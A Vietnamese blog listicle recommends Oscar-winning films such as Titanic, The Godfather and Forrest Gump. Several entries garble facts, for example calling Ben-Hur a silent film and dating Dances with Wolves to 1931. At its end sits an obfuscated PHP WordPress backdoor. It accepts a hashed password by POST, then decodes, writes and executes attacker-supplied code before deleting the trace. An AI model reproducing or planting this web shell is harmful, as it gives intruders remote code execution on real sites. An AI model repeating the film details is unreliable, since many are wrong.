Những bộ phim đoạt giải Oscar hay nhất mọi thời đại

Những bộ phim ngoài mục đích là đem đến cho khán giả những điều tốt nhất về mặt nội dung và hình thức, thì những giải thưởng lớn là điều mà tất cả họ điều hướng đến để ghi lại dấu ấn siêu phẩm của mình. Sau đây chúng tôi sẽ giới thiệu đến bạn những bộ phim đoạt giải oscar hay nhất mọi thời đại.

Top những bộ phim đoạt giải Oscar hay nhất mọi thời đại

Titanic

Những bộ phim đoạt giải Oscar hay nhất mọi thời đại-1

Có lẽ rất nhiều người đã đoán đúng bộ phim này sẽ đứng đầu danh sách. Ngoài giữ kỉ lục là một trong ba bộ phim có doanh thu nhiều nhất mọi thời đại. Thì một lần nữa tác phẩm lại làm mọi người rất ngưỡng mộ khi chỉ riêng nó thôi đã dành đến 11 giải thưởng Oscar dành cho những hạng mục quan trọng nhất. Bộ phim được thực hiện dưới sự chỉ đạo của đạo diễn James Cameron, với nội dung là câu chuyện kể lại một tai nạn lịch sử lớn nhất. Với tài hoa của người chỉ huy đã tái hiện thành một bộ phim siêu kinh điển, đồng thời giới thiệu cho mọi biết đến một tình yêu bất diệt thông qua hai nhân vật chính.

12 Years a slave

Những bộ phim đoạt giải Oscar hay nhất mọi thời đại-2

Tác phẩm được thực hiện bởi đạo diễn Steve McQueen. Dựa trên một câu chuyện có thật trong những năm trước khi nội chiến. Nhân vật Solomon Northup, ban đầu anh chỉ đơn thuần là một người da đen tự do của Mỹ, và rồi vô tình anh bị bắt cóc và bị bán làm nô lệ ở miền Nam. Với một chế độ nô lệ ấy anh đã phải chịu nhiều sự đau đớn và tàn ác, nhưng trong đó anh vẫn tìm thấy những lòng tốt để xem đó là một động lực để mình tiếp tục cuộc sống này. Và khi bước sang năm thứ 12 của những thử thách, một cuộc gặp gỡ định mệnh và một chế độ nô lệ tàn ác của Canada đã thay đổi số phận của anh mãi mãi. Thành công của bộ phim là giải thưởng Oscar với hạng mục “Kịch bản chuyển thể xuất sắc nhất”, “Nữ diễn viên phụ xuất sắc nhất” cùng với doanh thu 187 triệu đô la.

Xem Thêm  Hướng dẫn cách trồng và chăm bón rau má

The good father

Những bộ phim đoạt giải Oscar hay nhất mọi thời đại-3

Là một bộ phim được chuyển thể từ cuốn tiểu thuyết cùng tên của tác giả Mario Puzo. Câu chuyện viết về nhân vật  Vito Corleone-một ông trùm khét tiếng nhất của nước Mỹ lúc bấy giờ. Thế nhưng, người con trai út của ông sau khi được trở về từ thế chiến thứ 2, thì không tham gia bất cứ một phi vụ nào của gia đình. Một tai họa ập xuống gia đình khi trong đám cưới của con gái, một trận chiến quyết liệt đã nổ ra. Chính cô đã phải chứng kiến người cha của mình bị bọn mafia sát hại. Vậy anh sẽ làm như thế nào để có thể trả được mối thù cho cha mình?. Đây là một bộ phim về chủ đề hình sự và mafia gây ảnh hưởng nhất cho nền điện ảnh nước Mỹ. Tác phẩm đã thhu về cho mình 268 triệu đô la.

Ben Hur

Những bộ phim đoạt giải Oscar hay nhất mọi thời đại-4

Phim được lấy bối cảnh vào thời những năm đầu công nguyên. Vùng đất Judee thuộc quyền cai trị của đế quốc La Mã. Tại đây hoàng đế August Caear đã ban ra một quyết định hà khắc: Bắt buộc những người dân Do Thái phải trở về nguyên quán của họ, để bắt đầu kiểm tra lại dân số, hòng tránh thất thoát tiền thuế. Những người Do Thái ấy phải đi tha phương cầu thực khắp mọi nơi. Đây là một bộ phim được đầu tư nhiều nhất vào thời điểm ấy với con số 15 triệu USD. Nhưng đây là một tác phẩm vĩ đại nhất và ăn khách nhất trong lịch sử những phim câm. Với sự chỉ đạo của đạo diễn William Wyler thì đã đem lại thành công của bộ phim là doanh thu lên đến 90 triệu USD và nhận được 11 giải thưởng Oscar.

Xem Thêm  Voucher là gì? Tìm hiểu phiếu mua hàng voucher

Dances with Wolves

Những bộ phim đoạt giải Oscar hay nhất mọi thời đại-5

Tính đến thời điểm năm 1931 thì bộ phim này  với nội dung kể về miền Tây hoang dã nước Mỹ  là một tác phẩm lần đầu tiên nhận được giải thưởng Oscar. Dự án này mãi đến năm 1990 mới được phát hành. Nội dung thì được dựa trên cuốn tiểu thuyết cùng tên của nhà văn Michael Blake, một câu chuyện tình yêu đẹp giữa trung úy John Dunbar có nhiệm vụ canh gác nơi biên giới và một cô gái xinh đẹp thuộc bộ lạ Alaska.

Unforgiven

Những bộ phim đoạt giải Oscar hay nhất mọi thời đại-6

Trong tác phẩm này, Clint Eastwood là một đạo diễn kiêm luôn thực hiện vai diễn chính. Tác phẩm kể về một tay sát thủ với tên gọi là Wiliam Munny đã rữa tay gác kiếm từ lâu, thế nhưng một lời đề nghị nổi lên khiến hắn ta phải suy nghĩ lại. Một bí mật khiến cho người xem càng bị thu hút hơn là khi Clint Eastwood đã cầm kịch bản trong tay vào năm 1979 nhưng tự nhận thấy còn quá trẻ để có thể vào vai Wiliam Munny, nên ông đã ôm ấp đứa con tinh thần này đến tận 15 năm sau để đủ độ chính chắn thực hiện tác phẩm này.

Forrest Gump

Những bộ phim đoạt giải Oscar hay nhất mọi thời đại-7

Tác phẩm với nhân vật chính là Forrest-một đứa trẻ bất hạnh khi sinh ra đã không có cha, hơn thế nữa anh kém may mắn khi bị thiểu năng. Vào thời khi đi học anh luôn bị bạn bè bắt nạt. Chỉ có được một người bạn thân duy nhất là Jenny, nhờ cô mà anh phát hiện được những khả năng đặc biệt của mình. Sau khi tốt nghiệp xong, anh tham gia vào nhập ngũ và đến mặt trận Việt Nam để làm việc. Tại đây Bubba trờ thành người bạn thân thứ hai của anh. Anh rời chiến trường với một khả năng chơi bóng bàn xuất sắc và một vết thương trên người. Tất cả các biến cố đã làm thay đổi hoàn toàn cuộc sống của anh.

Xem Thêm  Ảnh con gái đẹp dễ thương đáng yêu nhất

Với gợi ý của chúng tôi về những bộ phim đoạt giải Oscar hay nhất mọi thời đại hi vọng các bạn thưởng thức phim vui vẻ nhé.

Bài Liên Quan:

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}